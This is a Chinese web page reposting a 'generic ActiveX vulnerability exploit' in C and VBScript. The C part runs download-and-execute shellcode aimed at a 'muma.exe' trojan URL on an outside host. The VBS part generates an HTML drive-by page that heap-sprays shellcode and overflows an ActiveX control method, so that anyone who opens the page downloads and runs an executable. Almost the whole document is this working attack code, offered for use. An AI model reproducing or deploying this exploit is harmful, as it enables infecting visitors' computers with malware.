ActiveX漏洞通用Exploit vbs修正版
导读:收集整理的这篇文章主要介绍了ActiveX漏洞通用Exploit vbs修正版,觉得挺不错的,现在分享给大家,也给大家做个参考。 C++代码 复制代码 代码如下:#include <...
收集整理的这篇文章主要介绍了ActiveX漏洞通用Exploit vbs修正版,觉得挺不错的,现在分享给大家,也给大家做个参考。 C++代码 复制代码 代码如下:
#include stdio.h>
#include string.h>
unsigned char shellcode[] =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xf2\x74"
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
"\xFF\xFF\xFF\x8B\x54\x24\xfc\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"
"http://fenggou.net/muma.exe";
int main()
{
void (* code)(); //把ShellCode转换成一个参数为空,返回为空的函数指针,并调用
* (int *) & code = shellcode;
code();
}
vbs代码
复制代码 代码如下:
exeurl = InputBox( "Please input you want down& exec url:", "输入","http://jb51.net/muma.exe" )
if exeurl > "" then
code="\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"& Unicode(exeurl& Chr(00)& Chr(00))
Function Unicode(str1)
Dim str,temp
str = ""
For i=1 to len(str1)
temp = Hex(AscW(Mid(str1,i,1)))
If len(temp) 5 Then temp = right("0000"& temp, 2)
str = str & "\x" & temp
Next
Unicode = str
End Function
function replACERegex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
set fso=createObject("scripting.fileSystemobject")
if fso.FileExists("jb51.htm") then
fso.deleteFile "jb51.htm",True
end If
set fileS=fso.oPEntextfile("jb51.htm",8,true)
fileS.wrITeline "htML> "
fileS.writeline "title> Sina/title> "
fileS.writeline "object classid=""clsid:8EF2A07C-6E69-4144-96AA-2247D892A73D"" id='target'> /object> "
fileS.writeline "body> "
fileS.writeline "SCRIPT language=""JavaScript""> "
fileS.writeline "VAR shellcode = unescape("""& replaceregex(code)& """); "
fileS.writeline "var Bigblock = unescape(""%u9090%u9090""); "
fileS.writeline "var headersize = 20; "
fileS.writeline "var slackspace = headersize+shellcode.length; "
fileS.writeline "while (bigblock.lengthslackspace) bigblock+=bigblock; "
fileS.writeline "fillblock = bigblock.substring(0, slackspace); "
fileS.writeline "block = bigblock.substring(0, bigblock.length-slackspace); "
fileS.writeline "while(block.length+slackspace0x40000) block = block+block+fillblock; "
fileS.writeline "memory = new Array(); "
fileS.writeline "for (x=0; x300; x++) memory[x] = block +shellcode; "
fileS.writeline "var buffer = ''; "
fileS.writeline "while (buffer.length 218) buffer+='\x0a\x0a\x0a\x0a'; "
fileS.writeline "target.Method1(buffer); "
fileS.writeline "/script> "
fileS.writeline "/body> "
fileS.writeline "/html> "
files.Close
Set fso=nothing
end if
声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!
若转载请注明出处: ActiveX漏洞通用Exploit vbs修正版
本文地址: https://pptw.com/jishu/609563.html